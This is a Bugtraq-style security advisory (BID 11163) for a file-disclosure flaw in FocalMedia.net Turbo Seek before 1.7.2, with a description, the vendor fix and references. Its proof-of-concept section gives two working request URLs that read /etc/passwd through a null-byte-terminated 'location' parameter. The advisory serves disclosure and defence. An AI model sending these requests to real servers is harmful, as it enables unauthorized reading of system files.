FocalMedia.net Turbo Seek Information Disclosure Vulnerability
BID:11163
Info
FocalMedia.net Turbo Seek Information Disclosure Vulnerability
| Bugtraq ID: | 11163 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 12 2004 12:00AM |
| Updated: | May 15 2006 05:09PM |
| Credit: | durito <[email protected]> disclosed this vulnerability. |
| Vulnerable: |
FocalMedia.net Turbo Seek 1.7.1 FocalMedia.net Turbo Seek 1.7 FocalMedia.net Turbo Seek 1.6 x FocalMedia.net Turbo Seek 1.5 x FocalMedia.net Turbo Seek 1.4 x |
| Not Vulnerable: |
FocalMedia.net Turbo Seek 1.7.2 |
Discussion
FocalMedia.net Turbo Seek Information Disclosure Vulnerability
Turbo Seek is reported prone to an information-disclosure vulnerability.
Successful exploitation reportedly causes the affected application to display the contents of requested files to the attacker. This allows attackers to retrieve the contents of potentially sensitive webserver-ccessible files. This may aid them in further attacks.
Versions prior to 1.7.2 are reported prone to this vulnerability.
Turbo Seek is reported prone to an information-disclosure vulnerability.
Successful exploitation reportedly causes the affected application to display the contents of requested files to the attacker. This allows attackers to retrieve the contents of potentially sensitive webserver-ccessible files. This may aid them in further attacks.
Versions prior to 1.7.2 are reported prone to this vulnerability.
Exploit / POC
FocalMedia.net Turbo Seek Information Disclosure Vulnerability
An exploit is not required. Examples sufficient to exploit this vulnerability have been provided:
http://www.example.com/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00
http://www.example.com/cgi-bin/tseekdir.cgi?id=799&location=/etc/passwd%00
An exploit is not required. Examples sufficient to exploit this vulnerability have been provided:
http://www.example.com/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00
http://www.example.com/cgi-bin/tseekdir.cgi?id=799&location=/etc/passwd%00
Solution / Fix
FocalMedia.net Turbo Seek Information Disclosure Vulnerability
Solution:
The vendor has released version 1.7.2 of the affected package:
FocalMedia.net Turbo Seek 1.4 x
FocalMedia.net Turbo Seek 1.5 x
FocalMedia.net Turbo Seek 1.6 x
FocalMedia.net Turbo Seek 1.7
FocalMedia.net Turbo Seek 1.7.1
Solution:
The vendor has released version 1.7.2 of the affected package:
FocalMedia.net Turbo Seek 1.4 x
-
FocalMedia.net Download Turbo Seek (latest available version)
http://www.focalmedia.net/tbdownload.html
FocalMedia.net Turbo Seek 1.5 x
-
FocalMedia.net Download Turbo Seek (latest available version)
http://www.focalmedia.net/tbdownload.html
FocalMedia.net Turbo Seek 1.6 x
-
FocalMedia.net Download Turbo Seek (latest available version)
http://www.focalmedia.net/tbdownload.html
FocalMedia.net Turbo Seek 1.7
-
FocalMedia.net Download Turbo Seek (latest available version)
http://www.focalmedia.net/tbdownload.html
FocalMedia.net Turbo Seek 1.7.1
-
FocalMedia.net Download Turbo Seek (latest available version)
http://www.focalmedia.net/tbdownload.html
References
FocalMedia.net Turbo Seek Information Disclosure Vulnerability
References:
References:
- Turbo Seek History (FocalMedia.net)
- Turbo Seek Home Page (FocalMedia.net)
- Re: tseekdir.cgi<--Local File Include ("Steven M. Christey"
)